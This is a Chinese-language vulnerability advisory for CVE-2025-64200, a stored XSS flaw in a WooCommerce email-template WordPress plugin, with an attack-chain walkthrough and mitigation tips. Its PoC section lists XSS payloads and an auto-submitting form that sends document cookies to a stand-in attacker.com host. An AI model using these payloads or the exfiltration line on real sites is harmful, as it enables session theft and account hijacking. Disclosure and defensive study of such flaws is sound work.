CVE-2025-64200 Email Template Customizer for WooCommerce存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64200

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

VillaTheme Email Template Customizer for WooCommerce (WordPress插件)

漏洞概述

CVE-2025-64200是WordPress插件Email Template Customizer for WooCommerce中的一个存储型跨站脚本（Stored XSS）漏洞。该插件由VillaTheme开发，用于自定义WooCommerce邮件模板。漏洞源于插件在处理用户输入时未能正确对特殊字符进行转义和过滤，导致攻击者可以在邮件模板中注入恶意JavaScript代码。由于漏洞属于存储型XSS，恶意代码会被永久保存在服务器端（数据库中），所有访问包含该恶意内容页面的用户都会受到攻击。攻击者可以利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或在用户浏览器中执行任意操作。该漏洞需要管理员权限才能利用，且需要用户交互才能触发攻击。CVSS 3.1评分5.9，属于中等严重程度。

技术细节

该存储型XSS漏洞存在于Email Template Customizer for WooCommerce插件的邮件模板编辑功能中。攻击者（具有管理员权限）可以在自定义邮件模板时，在模板内容中嵌入恶意JavaScript代码。插件在保存模板时未对用户输入进行充分的输入验证和输出编码，直接将包含恶意脚本的内容存入数据库。当其他用户查看或预览包含该恶意代码的邮件模板时，浏览器会解析并执行这段JavaScript代码。攻击向量为网络攻击（AV:N），攻击复杂度低（AC:L），但需要高权限用户操作（PR:H）。由于是存储型漏洞，攻击具有持久性，一旦恶意代码被植入，每次相关页面被访问时都会触发。攻击者可窃取受害者的认证令牌、进行CSRF攻击或重定向用户到恶意网站。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress网站的管理员账户访问权限

STEP 2

步骤2

攻击者登录管理后台，导航至Email Template Customizer插件的邮件模板编辑页面

STEP 3

步骤3

攻击者在邮件模板内容字段中注入恶意JavaScript代码（如<script>标签或事件处理器）

STEP 4

步骤4

插件将包含恶意代码的模板内容未经过滤地保存到数据库中

STEP 5

步骤5

当其他管理员或用户访问/预览该邮件模板时，浏览器解析并执行存储的恶意脚本

STEP 6

步骤6

攻击者通过JavaScript窃取用户会话cookie、劫持账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64200 Stored XSS PoC
// Target: Email Template Customizer for WooCommerce <= 1.2.17
// Author: PatchStack

// Steps to exploit:
// 1. Login as WordPress admin
// 2. Navigate to Email Template Customizer settings
// 3. Inject XSS payload in email template field

// Example XSS payload:
const xssPayload = '<script>alert(document.cookie)</script>';

// Or using event handlers (bypasses some filters):
const xssPayload2 = '<img src=x onerror=alert(document.domain)>';
const xssPayload3 = '<svg onload=alert(document.cookie)>';

// PoC: Auto-submit form with XSS payload
const exploitForm = `
<form action="[TARGET_URL]/wp-admin/admin.php?page=email-template-customizer" method="POST">
  <input type="hidden" name="email_template_content" value="<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>">
  <input type="submit" id="exploit">
</form>
<script>document.getElementById('exploit').click();</script>
`;

// This stored XSS will execute when admin previews the email template
// or when other users access template-related pages

影响范围

Email Template Customizer for WooCommerce <= 1.2.17

防御指南

临时缓解措施

在官方修复版本发布之前，可以采取以下临时缓解措施：1）限制管理员账户数量，确保只有可信人员拥有管理权限；2）使用WordPress安全插件监控管理员操作；3）临时禁用或替换该插件使用其他邮件模板解决方案；4）实施严格的访问控制，限制对插件设置页面的访问；5）启用Web应用防火墙规则拦截XSS攻击向量；6）定期检查数据库中是否有异常的模板内容。